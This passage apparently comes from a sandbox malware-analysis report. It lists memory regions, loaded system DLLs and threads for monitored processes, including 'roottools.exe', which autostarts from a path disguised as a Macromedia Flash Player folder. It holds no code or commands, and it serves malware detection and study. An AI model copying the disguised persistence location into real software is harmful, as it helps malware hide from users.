(normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2399 start_va = 0x7fefabf0000 end_va = 0x7fefac16fff entry_point = 0x7fefabf0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2400 start_va = 0x7fefac60000 end_va = 0x7fefacc6fff entry_point = 0x7fefac60000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2401 start_va = 0x7feface0000 end_va = 0x7fefacebfff entry_point = 0x7feface0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2402 start_va = 0x7fefad60000 end_va = 0x7fefad74fff entry_point = 0x7fefad60000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2403 start_va = 0x7fefb2d0000 end_va = 0x7fefb2dafff entry_point = 0x7fefb2d0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 2404 start_va = 0x7fefb2e0000 end_va = 0x7fefb2f8fff entry_point = 0x7fefb2e0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 2405 start_va = 0x7fefb300000 end_va = 0x7fefb314fff entry_point = 0x7fefb300000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 2406 start_va = 0x7fefb500000 end_va = 0x7fefb517fff entry_point = 0x7fefb500000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2407 start_va = 0x7fefc1a0000 end_va = 0x7fefc1abfff entry_point = 0x7fefc1a0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2408 start_va = 0x7fefc270000 end_va = 0x7fefc276fff entry_point = 0x7fefc270000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 2409 start_va = 0x7fefc360000 end_va = 0x7fefc37afff entry_point = 0x7fefc360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2410 start_va = 0x7fefc380000 end_va = 0x7fefc39dfff entry_point = 0x7fefc380000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2411 start_va = 0x7fefc4d0000 end_va = 0x7fefc4d9fff entry_point = 0x7fefc4d0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 2412 start_va = 0x7fefc5d0000 end_va = 0x7fefc616fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2413 start_va = 0x7fefc6f0000 end_va = 0x7fefc74afff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2414 start_va = 0x7fefc860000 end_va = 0x7fefc866fff entry_point = 0x7fefc860000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 2415 start_va = 0x7fefc870000 end_va = 0x7fefc8c4fff entry_point = 0x7fefc870000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2416 start_va = 0x7fefc8d0000 end_va = 0x7fefc8e6fff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2417 start_va = 0x7fefce70000 end_va = 0x7fefce7afff entry_point = 0x7fefce70000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2418 start_va = 0x7fefcea0000 end_va = 0x7fefcec4fff entry_point = 0x7fefcea0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2419 start_va = 0x7fefced0000 end_va = 0x7fefcedefff entry_point = 0x7fefced0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2420 start_va = 0x7fefcee0000 end_va = 0x7fefcf70fff entry_point = 0x7fefcee0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2421 start_va = 0x7fefcfc0000 end_va = 0x7fefcfd3fff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2422 start_va = 0x7fefcfe0000 end_va = 0x7fefcfeefff entry_point = 0x7fefcfe0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2423 start_va = 0x7fefd320000 end_va = 0x7fefd38afff entry_point = 0x7fefd320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2424 start_va = 0x7fefd3b0000 end_va = 0x7fefd48afff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2425 start_va = 0x7fefd490000 end_va = 0x7fefd49dfff entry_point = 0x7fefd490000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2426 start_va = 0x7fefd4a0000 end_va = 0x7fefd568fff entry_point = 0x7fefd4a0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2427 start_va = 0x7fefe300000 end_va = 0x7fefe32dfff entry_point = 0x7fefe300000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2428 start_va = 0x7fefe330000 end_va = 0x7fefe396fff entry_point = 0x7fefe330000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2429 start_va = 0x7fefe3a0000 end_va = 0x7fefe3a7fff entry_point = 0x7fefe3a0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2430 start_va = 0x7fefe810000 end_va = 0x7fefea12fff entry_point = 0x7fefe810000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2431 start_va = 0x7fefeb50000 end_va = 0x7fefebe8fff entry_point = 0x7fefeb50000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2432 start_va = 0x7fefebf0000 end_va = 0x7fefecf8fff entry_point = 0x7fefebf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2433 start_va = 0x7fefed80000 end_va = 0x7fefedf0fff entry_point = 0x7fefed80000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2434 start_va = 0x7fefef80000 end_va = 0x7feff01efff entry_point = 0x7fefef80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2435 start_va = 0x7feff020000 end_va = 0x7feff03efff entry_point = 0x7feff020000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2436 start_va = 0x7feff040000 end_va = 0x7feff08cfff entry_point = 0x7feff040000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2437 start_va = 0x7feff090000 end_va = 0x7feff1bcfff entry_point = 0x7feff090000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2438 start_va = 0x7feff1c0000 end_va = 0x7feff296fff entry_point = 0x7feff1c0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2439 start_va = 0x7feff3b0000 end_va = 0x7feff3b0fff entry_point = 0x7feff3b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2440 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 2441 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 2442 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2443 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2444 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2445 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2446 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2447 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2448 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2449 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2450 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2451 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2452 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2453 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 183 os_tid = 0x8d4 Thread: id = 184 os_tid = 0x720 Thread: id = 185 os_tid = 0xb7c Thread: id = 186 os_tid = 0x344 Thread: id = 187 os_tid = 0x7dc Thread: id = 188 os_tid = 0x7d8 Thread: id = 189 os_tid = 0x79c Thread: id = 190 os_tid = 0x77c Thread: id = 191 os_tid = 0x734 Thread: id = 192 os_tid = 0x134 Thread: id = 193 os_tid = 0x11c Thread: id = 194 os_tid = 0xcc Thread: id = 195 os_tid = 0x3fc Thread: id = 200 os_tid = 0xaf0 Process: id = "15" image_name = "roottools.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" page_root = "0x72d9e000" os_pid = "0x6a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f83e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2578 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2579 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2580 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2581 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2582 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2583 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2584 start_va = 0x400000 end_va = 0x432fff entry_point = 0x400000 region_type = mapped_file name = "roottools.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") Region: id = 2585 start_va = 0x77ad0000 end_va = 0x77c78fff entry_point = 0x77ad0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2586 start_va = 0x77cb0000 end_va = 0x77e2ffff entry_point = 0x77cb0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2587 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2588 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2589 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2590 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2591 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2592 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2593 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2726 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2727 start_va = 0x743d0000 end_va = 0x743d7fff entry_point = 0x743d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2728 start_va = 0x743e0000 end_va = 0x7443bfff entry_point = 0x743e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2729 start_va = 0x74440000 end_va = 0x7447efff entry_point = 0x74440000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2730 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2731 start_va = 0x759c0000 end_va = 0x75acffff entry_point = 0x759c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2732 start_va = 0x76640000 end_va = 0x76685fff entry_point = 0x76640000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2733 start_va = 0x778b0000 end_va = 0x779a9fff entry_point = 0x0 region_type = private name = "private_0x00000000778b0000" filename = "" Region: id = 2734 start_va = 0x779b0000 end_va = 0x77acefff entry_point = 0x0 region_type = private name = "private_0x00000000779b0000" filename = "" Region: id = 2735 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2736 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2737 start_va = 0x72940000 end_va = 0x72a92fff entry_point = 0x72940000 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 2738 start_va = 0x75800000 end_va = 0x7580bfff entry_point = 0x75800000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2739 start_va = 0x75810000 end_va = 0x7586ffff entry_point = 0x75810000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2740 start_va = 0x758c0000 end_va = 0x759bffff entry_point = 0x758c0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2741 start_va = 0x75ae0000 end_va = 0x75c3bfff entry_point = 0x75ae0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2742 start_va = 0x75e70000 end_va = 0x75f1bfff entry_point = 0x75e70000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2743 start_va = 0x76110000 end_va = 0x761acfff entry_point = 0x76110000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2744 start_va = 0x761b0000 end_va = 0x7623efff entry_point = 0x761b0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2745 start_va = 0x767d0000 end_va = 0x767e8fff entry_point = 0x767d0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2746 start_va = 0x76800000 end_va = 0x768effff entry_point = 0x76800000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2747 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2748 start_va = 0x76950000 end_va = 0x769dffff entry_point = 0x76950000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2749 start_va = 0x77740000 end_va = 0x777dffff entry_point = 0x77740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2750 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2751 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2752 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2753 start_va = 0x520000 end_va = 0x6a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 2754 start_va = 0x760b0000 end_va = 0x7610ffff entry_point = 0x760b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2755 start_va = 0x76570000 end_va = 0x7663bfff entry_point = 0x76570000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2756 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2757 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2758 start_va = 0x6b0000 end_va = 0x830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 2759 start_va = 0x840000 end_va = 0x1c3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 2760 start_va = 0x1c40000 end_va = 0x1d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 2761 start_va = 0x1d40000 end_va = 0x213ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 2762 start_va = 0x2140000 end_va = 0x240efff entry_point = 0x2140000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2763 start_va = 0x1c40000 end_va = 0x1d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 2764 start_va = 0x1d30000 end_va = 0x1d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 2765 start_va = 0x440000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2766 start_va = 0x741b0000 end_va = 0x7422ffff entry_point = 0x741b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2767 start_va = 0x2410000 end_va = 0x263ffff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 2768 start_va = 0x2410000 end_va = 0x24eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002410000" filename = "" Region: id = 2769 start_va = 0x2600000 end_va = 0x263ffff entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 2770 start_va = 0x290000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2771 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2772 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2773 start_va = 0x74010000 end_va = 0x7406efff entry_point = 0x74010000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 2774 start_va = 0x74130000 end_va = 0x74142fff entry_point = 0x74130000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2775 start_va = 0x2a0000 end_va = 0x2a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2776 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 2777 start_va = 0x2640000 end_va = 0x2a32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002640000" filename = "" Region: id = 2778 start_va = 0x2a40000 end_va = 0x336ffff entry_point = 0x2a40000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 2779 start_va = 0x1c40000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 2780 start_va = 0x1ce0000 end_va = 0x1d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 2781 start_va = 0x76a70000 end_va = 0x776b9fff entry_point = 0x76a70000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2782 start_va = 0x76370000 end_va = 0x763c6fff entry_point = 0x76370000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2783 start_va = 0x756d0000 end_va = 0x756ebfff entry_point = 0x756d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2784 start_va = 0x767f0000 end_va = 0x767f5fff entry_point = 0x767f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2785 start_va = 0x756c0000 end_va = 0x756c6fff entry_point = 0x756c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2786 start_va = 0x2c0000 end_va = 0x2c7fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2787 start_va = 0x756a0000 end_va = 0x756b1fff entry_point = 0x756a0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 2788 start_va = 0x777e0000 end_va = 0x77814fff entry_point = 0x777e0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2789 start_va = 0x3370000 end_va = 0x349ffff entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 2790 start_va = 0x440000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2791 start_va = 0x4b0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2792 start_va = 0x24f0000 end_va = 0x25effff entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 2793 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2794 start_va = 0x34a0000 end_va = 0xb49ffff entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 2795 start_va = 0x400000 end_va = 0x41bfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2796 start_va = 0x76240000 end_va = 0x7635cfff entry_point = 0x76240000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2797 start_va = 0x76360000 end_va = 0x7636bfff entry_point = 0x76360000 region_type = mapped_file name = 